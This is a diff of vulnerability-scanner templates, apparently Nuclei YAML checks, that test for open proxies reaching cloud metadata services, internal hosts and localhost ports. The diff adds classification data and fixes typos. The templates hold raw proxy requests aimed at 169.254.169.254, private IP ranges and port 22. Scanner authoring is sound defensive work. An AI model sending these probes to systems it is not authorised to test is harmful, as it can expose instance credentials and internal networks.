- 169.254.169.254 - 169.254.169.254
unsafe: true unsafe: true
matchers: matchers:
- type: word - type: word
@ -44,3 +39,4 @@ requests:
- "local-ipv4:" - "local-ipv4:"
- "instance-id:" - "instance-id:"
condition: or condition: or
# Enhanced by cs on 2022/02/14

View File

@ -1,5 +1,4 @@
id: metadata-service-openstack id: metadata-service-openstack
# This attack abuses a misconfigured proxy that allows access to the metadata # This attack abuses a misconfigured proxy that allows access to the metadata
# IP or a name which resolves to the IP. A standard proxy request is made to # IP or a name which resolves to the IP. A standard proxy request is made to
# the proxy using the full metadata URL, which the proxy will fulfull to its # the proxy using the full metadata URL, which the proxy will fulfull to its
@ -7,33 +6,34 @@ id: metadata-service-openstack
# #
# The proxy may also be vulnerable to host/port enumeration on localhost or # The proxy may also be vulnerable to host/port enumeration on localhost or
# inside the private network. # inside the private network.
info: info:
name: Openstack Metadata Service Check name: Openstack Metadata Service Check
author: sullo author: sullo
severity: critical severity: critical
description: The Openstack host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure. description: The Openstack host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure.
remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
reference: reference:
- https://docs.openstack.org/nova/latest/admin/metadata-service.html - https://docs.openstack.org/nova/latest/admin/metadata-service.html
- https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
- https://www.mcafee.com/blogs/enterprise/cloud-security/how-an-attacker-could-use-instance-metadata-to-breach-your-app-in-aws/ - https://www.mcafee.com/blogs/enterprise/cloud-security/how-an-attacker-could-use-instance-metadata-to-breach-your-app-in-aws/
tags: exposure,config,openstack,proxy,misconfig,metadata tags: exposure,config,openstack,proxy,misconfig,metadata
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
cvss-score: 9.3
cwe-id: CWE-441
requests: requests:
- raw: - raw:
- |+ - |+
GET http://{{hostval}}/openstack/latest HTTP/1.1 GET http://{{hostval}}/openstack/latest HTTP/1.1
Host: {{hostval}} Host: {{hostval}}
payloads: payloads:
hostval: hostval:
- aws.interact.sh - aws.interact.sh
- 169.254.169.254 - 169.254.169.254
unsafe: true unsafe: true
matchers: matchers:
- type: word - type: word
part: body part: body
words: words:
- "vendor_data.json" - "vendor_data.json"
# Enhanced by cs on 2022/02/14

View File

@ -1,40 +1,40 @@
id: metadata-service-oracle id: metadata-service-oracle
# This attack abuses a misconfigured proxy that allows access to the metadata # This attack abuses a misconfigured proxy that allows access to the metadata
# IP or a name which resolves to the IP. A standard proxy request is made to # IP or a name which resolves to the IP. A standard proxy request is made to
# the proxy using the full metadata URL, which the proxy will fulfull to its # the proxy using the full metadata URL, which the proxy will fulfill to its
# own metadata sevice. # own metadata service.
# #
# The proxy may also be vulnerable to host/port enumeration on localhost or # The proxy may also be vulnerable to host/port enumeration on localhost or
# inside the private network. # inside the private network.
info: info:
name: Oracle Cloud Metadata Service Check name: Oracle Cloud Metadata Service Check
author: sullo author: sullo
severity: critical severity: critical
description: The Oracle cloud host is configured as a proxy which allows access to the instance metadata IMDSv1 service. This could allow significant access to the host/infrastructure. description: The Oracle cloud host is configured as a proxy which allows access to the instance metadata IMDSv1 service. This could allow significant access to the host/infrastructure.
remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible.
reference: reference:
- https://docs.oracle.com/en-us/iaas/Content/Compute/Tasks/gettingmetadata.htm - https://docs.oracle.com/en-us/iaas/Content/Compute/Tasks/gettingmetadata.htm
- https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
- https://www.mcafee.com/blogs/enterprise/cloud-security/how-an-attacker-could-use-instance-metadata-to-breach-your-app-in-aws/ - https://www.mcafee.com/blogs/enterprise/cloud-security/how-an-attacker-could-use-instance-metadata-to-breach-your-app-in-aws/
tags: exposure,config,oracle,proxy,misconfig,metadata tags: exposure,config,oracle,proxy,misconfig,metadata
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
cvss-score: 9.3
cwe-id: CWE-441
requests: requests:
- raw: - raw:
- |+ - |+
GET http://{{hostval}}/opc/v1/instance HTTP/1.1 GET http://{{hostval}}/opc/v1/instance HTTP/1.1
Host: {{hostval}} Host: {{hostval}}
Metadata: true Metadata: true
payloads: payloads:
hostval: hostval:
- aws.interact.sh - aws.interact.sh
- 169.254.169.254 - 169.254.169.254
unsafe: true unsafe: true
matchers: matchers:
- type: word - type: word
part: body part: body
words: words:
- "availabilityDomain" - "availabilityDomain"
# Enhanced by cs on 2022/02/14

View File

@ -1,12 +1,11 @@
id: open-proxy-internal id: open-proxy-internal
info: info:
name: Open Proxy To Internal Network name: Open Proxy To Internal Network
author: sullo author: sullo
severity: high severity: high
tags: exposure,config,proxy,misconfig,fuzz tags: exposure,config,proxy,misconfig,fuzz
description: The host is configured as a proxy which allows access to other hosts on the internal network. description: The host is configured as a proxy which allows access to other hosts on the internal network.
remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports.
reference: reference:
- https://blog.projectdiscovery.io/abusing-reverse-proxies-internal-access/ - https://blog.projectdiscovery.io/abusing-reverse-proxies-internal-access/
- https://en.wikipedia.org/wiki/Open_proxy - https://en.wikipedia.org/wiki/Open_proxy
@ -15,109 +14,83 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6 cvss-score: 8.6
cwe-id: CWE-441 cwe-id: CWE-441
requests: requests:
- raw: - raw:
- |+ - |+
GET / HTTP/1.1 GET / HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
- |+ - |+
GET http://192.168.0.1/ HTTP/1.1 GET http://192.168.0.1/ HTTP/1.1
Host: 192.168.0.1 Host: 192.168.0.1
- |+ - |+
GET https://192.168.0.1/ HTTP/1.1 GET https://192.168.0.1/ HTTP/1.1
Host: 192.168.0.1 Host: 192.168.0.1
- |+ - |+
GET http://192.168.0.1:22/ HTTP/1.1 GET http://192.168.0.1:22/ HTTP/1.1
Host: 192.168.0.1 Host: 192.168.0.1
- |+ - |+
GET http://192.168.1.1/ HTTP/1.1 GET http://192.168.1.1/ HTTP/1.1
Host: 192.168.1.1 Host: 192.168.1.1
- |+ - |+
GET https://192.168.1.1/ HTTP/1.1 GET https://192.168.1.1/ HTTP/1.1
Host: 192.168.1.1 Host: 192.168.1.1
- |+ - |+
GET http://192.168.1.1:22/ HTTP/1.1 GET http://192.168.1.1:22/ HTTP/1.1
Host: 192.168.1.1 Host: 192.168.1.1
- |+ - |+
GET http://192.168.2.1/ HTTP/1.1 GET http://192.168.2.1/ HTTP/1.1
Host: 192.168.2.1 Host: 192.168.2.1
- |+ - |+
GET https://192.168.2.1/ HTTP/1.1 GET https://192.168.2.1/ HTTP/1.1
Host: 192.168.2.1 Host: 192.168.2.1
- |+ - |+
GET http://192.168.2.1:22/ HTTP/1.1 GET http://192.168.2.1:22/ HTTP/1.1
Host: 192.168.2.1 Host: 192.168.2.1
- |+ - |+
GET http:/10.0.0.1/ HTTP/1.1 GET http:/10.0.0.1/ HTTP/1.1
Host: 10.0.0.1 Host: 10.0.0.1
- |+ - |+
GET https://10.0.0.1/ HTTP/1.1 GET https://10.0.0.1/ HTTP/1.1
Host: 10.0.0.1 Host: 10.0.0.1
- |+ - |+
GET http://10.0.0.1:22/ HTTP/1.1 GET http://10.0.0.1:22/ HTTP/1.1
Host: 10.0.0.1 Host: 10.0.0.1
- |+ - |+
GET http:/172.16.0.1/ HTTP/1.1 GET http:/172.16.0.1/ HTTP/1.1
Host: 172.16.0.1 Host: 172.16.0.1
- |+ - |+
GET https://172.16.0.1/ HTTP/1.1 GET https://172.16.0.1/ HTTP/1.1
Host: 172.16.0.1 Host: 172.16.0.1
- |+ - |+
GET http://172.16.0.1:22/ HTTP/1.1 GET http://172.16.0.1:22/ HTTP/1.1
Host: 172.16.0.1 Host: 172.16.0.1
- |+ - |+
GET http:/intranet/ HTTP/1.1 GET http:/intranet/ HTTP/1.1
Host: intranet Host: intranet
- |+ - |+
GET https://intranet/ HTTP/1.1 GET https://intranet/ HTTP/1.1
Host: intranet Host: intranet
- |+ - |+
GET http://intranet:22/ HTTP/1.1 GET http://intranet:22/ HTTP/1.1
Host: intranet Host: intranet
- |+ - |+
GET http:/mail/ HTTP/1.1 GET http:/mail/ HTTP/1.1
Host: mail Host: mail
- |+ - |+
GET https://mail/ HTTP/1.1 GET https://mail/ HTTP/1.1
Host: mail Host: mail
- |+ - |+
GET http://mail:22/ HTTP/1.1 GET http://mail:22/ HTTP/1.1
Host: mail Host: mail
- |+ - |+
GET http:/ntp/ HTTP/1.1 GET http:/ntp/ HTTP/1.1
Host: ntp Host: ntp
- |+ - |+
GET https://ntp/ HTTP/1.1 GET https://ntp/ HTTP/1.1
Host: ntp Host: ntp
- |+ - |+
GET http://ntp:22/ HTTP/1.1 GET http://ntp:22/ HTTP/1.1
Host: ntp Host: ntp
unsafe: true unsafe: true
matchers: matchers:
- type: dsl - type: dsl
@ -134,3 +107,4 @@ requests:
- (!contains(body_1, "ssh")) && (contains(body_2, "ssh") || contains(body_3, "ssh")) || contains(body_4, "ssh") || contains(body_5, "ssh") || contains(body_6, "ssh") || contains(body_7, "ssh") || contains(body_8, "ssh") || contains(body_9, "ssh") || contains(body_10, "ssh") || contains(body_11, "ssh") || contains(body_12, "ssh") || contains(body_13, "ssh") || contains(body_14, "ssh") || contains(body_15, "ssh") || contains(body_16, "ssh") || contains(body_17, "ssh") || contains(body_18, "ssh") || contains(body_19, "ssh") || contains(body_20, "ssh") || contains(body_21, "ssh") || contains(body_22, "ssh") || contains(body_23, "ssh") || contains(body_24, "ssh") - (!contains(body_1, "ssh")) && (contains(body_2, "ssh") || contains(body_3, "ssh")) || contains(body_4, "ssh") || contains(body_5, "ssh") || contains(body_6, "ssh") || contains(body_7, "ssh") || contains(body_8, "ssh") || contains(body_9, "ssh") || contains(body_10, "ssh") || contains(body_11, "ssh") || contains(body_12, "ssh") || contains(body_13, "ssh") || contains(body_14, "ssh") || contains(body_15, "ssh") || contains(body_16, "ssh") || contains(body_17, "ssh") || contains(body_18, "ssh") || contains(body_19, "ssh") || contains(body_20, "ssh") || contains(body_21, "ssh") || contains(body_22, "ssh") || contains(body_23, "ssh") || contains(body_24, "ssh")
- (!contains(body_1, "SSH")) && (contains(body_2, "SSH") || contains(body_3, "SSH")) || contains(body_4, "SSH") || contains(body_5, "SSH") || contains(body_6, "SSH") || contains(body_7, "SSH") || contains(body_8, "SSH") || contains(body_9, "SSH") || contains(body_10, "SSH") || contains(body_11, "SSH") || contains(body_12, "SSH") || contains(body_13, "SSH") || contains(body_14, "SSH") || contains(body_15, "SSH") || contains(body_16, "SSH") || contains(body_17, "SSH") || contains(body_18, "SSH") || contains(body_19, "SSH") || contains(body_20, "SSH") || contains(body_21, "SSH") || contains(body_22, "SSH") || contains(body_23, "SSH") - (!contains(body_1, "SSH")) && (contains(body_2, "SSH") || contains(body_3, "SSH")) || contains(body_4, "SSH") || contains(body_5, "SSH") || contains(body_6, "SSH") || contains(body_7, "SSH") || contains(body_8, "SSH") || contains(body_9, "SSH") || contains(body_10, "SSH") || contains(body_11, "SSH") || contains(body_12, "SSH") || contains(body_13, "SSH") || contains(body_14, "SSH") || contains(body_15, "SSH") || contains(body_16, "SSH") || contains(body_17, "SSH") || contains(body_18, "SSH") || contains(body_19, "SSH") || contains(body_20, "SSH") || contains(body_21, "SSH") || contains(body_22, "SSH") || contains(body_23, "SSH")
condition: or condition: or
# Enhanced by cs on 2022/02/14

View File

@ -1,12 +1,11 @@
id: open-proxy-http-portscan id: open-proxy-http-portscan
info: info:
name: Open Proxy to Other Web Ports on Proxy's localhost Interface name: Open Proxy to Other Web Ports on Proxy's localhost Interface
author: sullo author: sullo
severity: high severity: high
tags: exposure,config,proxy,misconfig,fuzz tags: exposure,config,proxy,misconfig,fuzz
description: The host is configured as a proxy which allows access to web ports on the host's internal interface. description: The host is configured as a proxy which allows access to web ports on the host's internal interface.
remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports.
reference: reference:
- https://blog.projectdiscovery.io/abusing-reverse-proxies-internal-access/ - https://blog.projectdiscovery.io/abusing-reverse-proxies-internal-access/
- https://en.wikipedia.org/wiki/Open_proxy - https://en.wikipedia.org/wiki/Open_proxy
@ -15,33 +14,26 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6 cvss-score: 8.6
cwe-id: CWE-441 cwe-id: CWE-441
requests: requests:
- raw: - raw:
- |+ - |+
GET / HTTP/1.1 GET / HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
- |+ - |+
GET http://somethingthatdoesnotexist/ HTTP/1.1 GET http://somethingthatdoesnotexist/ HTTP/1.1
Host: somethingthatdoesnotexist Host: somethingthatdoesnotexist
- |+ - |+
GET http://127.0.0.1/ HTTP/1.1 GET http://127.0.0.1/ HTTP/1.1
Host: 127.0.0.1 Host: 127.0.0.1
- |+ - |+
GET https://127.0.0.1/ HTTP/1.1 GET https://127.0.0.1/ HTTP/1.1
Host: 127.0.0.1 Host: 127.0.0.1
- |+ - |+
GET http://localhost/ HTTP/1.1 GET http://localhost/ HTTP/1.1
Host: localhost Host: localhost
- |+ - |+
GET https://localhost/ HTTP/1.1 GET https://localhost/ HTTP/1.1
Host: localhost Host: localhost
unsafe: true unsafe: true
req-condition: true req-condition: true
stop-at-first-match: true stop-at-first-match: true
@ -59,3 +51,4 @@ requests:
- (!contains(body_1, "Welcome to Windows") && !contains(body_2, "Welcome to Windows")) && (contains(body_3, "Welcome to Windows") || contains(body_4, "Welcome to Windows") || contains(body_5, "Welcome to Windows") || contains(body_6, "Welcome to Windows")) - (!contains(body_1, "Welcome to Windows") && !contains(body_2, "Welcome to Windows")) && (contains(body_3, "Welcome to Windows") || contains(body_4, "Welcome to Windows") || contains(body_5, "Welcome to Windows") || contains(body_6, "Welcome to Windows"))
- (!contains(body_1, "Welcome to Windows") && !contains(body_2, "Welcome to Windows")) && (contains(body_3, "Welcome to Windows") || contains(body_4, "Welcome to Windows") || contains(body_5, "Welcome to Windows") || contains(body_6, "Welcome to Windows")) - (!contains(body_1, "Welcome to Windows") && !contains(body_2, "Welcome to Windows")) && (contains(body_3, "Welcome to Windows") || contains(body_4, "Welcome to Windows") || contains(body_5, "Welcome to Windows") || contains(body_6, "Welcome to Windows"))
- (!contains(body_1, "It works") && !contains(body_2, "It works")) && (contains(body_3, "It works") || contains(body_4, "It works") || contains(body_5, "It works") || contains(body_6, "It works")) - (!contains(body_1, "It works") && !contains(body_2, "It works")) && (contains(body_3, "It works") || contains(body_4, "It works") || contains(body_5, "It works") || contains(body_6, "It works"))
# Enhanced by cs on 2022/02/14